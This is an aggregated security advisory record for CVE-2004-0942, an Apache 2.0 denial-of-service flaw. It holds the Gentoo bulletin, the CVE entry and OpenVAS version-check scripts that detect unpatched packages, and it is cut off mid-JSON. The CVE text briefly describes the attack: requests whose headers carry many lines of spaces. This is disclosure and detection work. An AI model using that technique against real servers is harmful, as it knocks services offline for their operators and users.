Apache 2.0: Denial of Service by memory consumption
2004-11-10T00:00:00
ID GLSA-200411-18 Type gentoo Reporter Gentoo Foundation Modified 2007-12-30T00:00:00
Description
Background
The Apache HTTP Server is one of the most popular web servers on the Internet.
Description
Chintan Trivedi discovered a vulnerability in Apache httpd 2.0 that is caused by improper enforcing of the field length limit in the header-parsing code.
Impact
By sending a large amount of specially-crafted HTTP GET requests a remote attacker could cause a Denial of Service of the targeted system.
Workaround
There is no known workaround at this time.
Resolution
All Apache 2.0 users should upgrade to the latest version:
{"id": "GLSA-200411-18", "lastseen": "2016-09-06T19:46:36", "viewCount": 2, "bulletinFamily": "unix", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "edition": 1, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2016-09-06T19:46:36", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2004-0942"]}, {"type": "seebug", "idList": ["SSV:15491", "SSV:63025"]}, {"type": "nessus", "idList": ["MACOSX_SECUPD2005-007.NASL", "FEDORA_2004-421.NASL", "FREEBSD_PKG_282DFEA0337811D9B404000C6E8F12EF.NASL", "UBUNTU_USN-23-1.NASL", "MANDRAKE_MDKSA-2004-135.NASL", "FREEBSD_APACHE2_2052_2.NASL", "HPUX_PHSS_33075.NASL", "GENTOO_GLSA-200411-18.NASL", "FEDORA_2004-420.NASL", "REDHAT-RHSA-2004-562.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231065450", "OPENVAS:52310", "OPENVAS:1361412562310835031", "OPENVAS:65450", "OPENVAS:835031", "OPENVAS:54739"]}, {"type": "osvdb", "idList": ["OSVDB:11391"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:35097"]}, {"type": "freebsd", "idList": ["282DFEA0-3378-11D9-B404-000C6E8F12EF"]}, {"type": "ubuntu", "idList": ["USN-23-1"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:E9EA96C2B20207865E30D83F6DC37198"]}, {"type": "exploitdb", "idList": ["EDB-ID:855"]}, {"type": "httpd", "idList": ["HTTPD:544572A12CC21CCC7B8861E1ED83549F", "HTTPD:7DB6A0BF4F2F0BA0A5CF3BF679509342"]}, {"type": "redhat", "idList": ["RHSA-2004:562"]}], "modified": "2016-09-06T19:46:36", "rev": 2}, "vulnersScore": 5.6}, "type": "gentoo", "affectedPackage": [{"arch": "all", "packageFilename": "UNKNOWN", "OSVersion": "any", "operator": "lt", "packageName": "www-servers/apache", "packageVersion": "2.0.52-r1", "OS": "Gentoo"}], "description": "### Background\n\nThe Apache HTTP Server is one of the most popular web servers on the Internet. \n\n### Description\n\nChintan Trivedi discovered a vulnerability in Apache httpd 2.0 that is caused by improper enforcing of the field length limit in the header-parsing code. \n\n### Impact\n\nBy sending a large amount of specially-crafted HTTP GET requests a remote attacker could cause a Denial of Service of the targeted system. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Apache 2.0 users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-servers/apache-2.0.52-r1\"", "title": "Apache 2.0: Denial of Service by memory consumption", "cvelist": ["CVE-2004-0942"], "published": "2004-11-10T00:00:00", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942", "http://www.apacheweek.com/features/security-20", "https://bugs.gentoo.org/show_bug.cgi?id=70138"], "reporter": "Gentoo Foundation", "modified": "2007-12-30T00:00:00", "href": "https://security.gentoo.org/glsa/200411-18"}
{"cve": [{"lastseen": "2021-02-02T05:22:59", "description": "Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.", "edition": 8, "cvss3": {}, "published": "2005-02-09T05:00:00", "title": "CVE-2004-0942", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0942"], "modified": "2017-10-11T01:29:00", "cpe": ["cpe:/a:apache:http_server:2.0.52"], "id": "CVE-2004-0942", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0942", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200411-18.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54739", "href": "http://plugins.openvas.org/nasl.php?oid=54739", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200411-18 (apache)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw in Apache 2.0 could allow a remote attacker to cause a Denial of\nService.\";\ntag_solution = \"All Apache 2.0 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/apache-2.0.52-r1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200411-18\nhttp://bugs.gentoo.org/show_bug.cgi?id=70138\nhttp://www.apacheweek.com/features/security-20\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200411-18.\";\n\n \n\nif(description)\n{\n script_id(54739);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(11436);\n script_cve_id(\"CVE-2004-0942\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200411-18 (apache)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/apache\", unaffected: make_list(\"ge 2.0.52-r1\", \"lt 2.0\"), vulnerable: make_list(\"lt 2.0.52-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0942"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52310", "href": "http://plugins.openvas.org/nasl.php?oid=52310", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID 282dfea0-3378-11d9-b404-000c6e8f12ef\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: apache\n\nCVE-2004-0942\nApache webserver 2.0.52 and earlier allows remote attackers to cause a\ndenial of service (CPU consumption) via an HTTP GET request with a\nMIME header containing multiple lines with a large number of space\ncharacters.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://marc.theaimsgroup.com/?l=full-disclosure&m=109930632317208\nhttp://www.vuxml.org/freebsd/282dfea0-3378-11d9-b404-000c6e8f12ef.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52310);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(11436);\n script_cve_id(\"CVE-2004-0942\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2\")>0 && revcomp(a:bver, b:\"2.0.52_2\")<=0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "description": "Check for the Version of HP-UX Pkg", "modified": "2018-04-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:1361412562310835031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310835031", "type": "openvas", "title": "HP-UX Update for HP-UX Pkg HPSBUX01123", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for HP-UX Pkg HPSBUX01123\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote denial of service (DoS) or bypass of SSLCipherSuite settings.\";\ntag_affected = \"HP-UX Pkg on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server. HP-UX B.11.04 with Virtualvault 4.7 running Apache \n 2.x Web Server.\";\ntag_insight = \"A potential security vulnerability has beenidentified with Apache running on \n HP-UX where the vulnerability could beexploited remotely to create a Denial \n of Service (DoS) or to bypassSSLCipherSuite restrictions.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01035700-1\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.835031\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01123\");\n script_cve_id(\"CVE-2004-0942\", \"CVE-2004-0885\");\n script_name( \"HP-UX Update for HP-UX Pkg HPSBUX01123\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of HP-UX Pkg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.53.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_33075'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.53.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.53.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.53.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-prefork\n apache2-worker\n apache2-devel\n libapr0\n apache2-example-pages\n apache2-doc\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009713 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:136141256231065450", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065450", "type": "openvas", "title": "SLES9: Security update for apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5009713.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Security update for apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-prefork\n apache2-worker\n apache2-devel\n libapr0\n apache2-example-pages\n apache2-doc\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009713 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65450\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0942\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.49~27.18.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:44", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "description": "Check for the Version of HP-UX Pkg", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835031", "href": "http://plugins.openvas.org/nasl.php?oid=835031", "type": "openvas", "title": "HP-UX Update for HP-UX Pkg HPSBUX01123", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for HP-UX Pkg HPSBUX01123\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Remote denial of service (DoS) or bypass of SSLCipherSuite settings.\";\ntag_affected = \"HP-UX Pkg on\n HP-UX B.11.00, B.11.11, B.11.22, and B.11.23 running the hpuxwsAPACHE HP-UX \n Apache-based Web Server. HP-UX B.11.04 with Virtualvault 4.7 running Apache \n 2.x Web Server.\";\ntag_insight = \"A potential security vulnerability has beenidentified with Apache running on \n HP-UX where the vulnerability could beexploited remotely to create a Denial \n of Service (DoS) or to bypassSSLCipherSuite restrictions.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01035700-1\");\n script_id(835031);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"HPSBUX\", value: \"01123\");\n script_cve_id(\"CVE-2004-0942\", \"CVE-2004-0885\");\n script_name( \"HP-UX Update for HP-UX Pkg HPSBUX01123\");\n\n script_summary(\"Check for the Version of HP-UX Pkg\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.00\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.53.00\", rls:\"HPUX11.00\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.04\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"VaultWS.WS-CORE\", patch_list:['PHSS_33075'], rls:\"HPUX11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"A.2.0.53.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.53.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE\", revision:\"B.2.0.53.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:55:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0885", "CVE-2004-0942"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-prefork\n apache2-worker\n apache2-devel\n libapr0\n apache2-example-pages\n apache2-doc\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009713 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-10T00:00:00", "id": "OPENVAS:65450", "href": "http://plugins.openvas.org/nasl.php?oid=65450", "type": "openvas", "title": "SLES9: Security update for apache2", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: sles9p5009713.nasl 6666 2017-07-11 13:13:36Z cfischer $\n# Description: Security update for apache2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-prefork\n apache2-worker\n apache2-devel\n libapr0\n apache2-example-pages\n apache2-doc\n apache2\n\nFor more information, please visit the referenced security\nadvisories.\n\nMore details may also be found by searching for keyword\n5009713 within the SuSE Enterprise Server 9 patch\ndatabase at http://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n \nif(description)\n{\n script_id(65450);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-10 16:11:46 +0200 (Sat, 10 Oct 2009)\");\n script_cve_id(\"CVE-2004-0942\", \"CVE-2004-0885\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES9: Security update for apache2\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-prefork\", rpm:\"apache2-prefork~2.0.49~27.18.3\", rls:\"SLES9.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": 